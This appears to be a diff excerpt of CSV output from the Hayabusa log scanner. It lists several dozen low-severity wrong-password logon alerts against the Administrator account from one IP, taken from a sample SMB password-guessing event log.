+2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
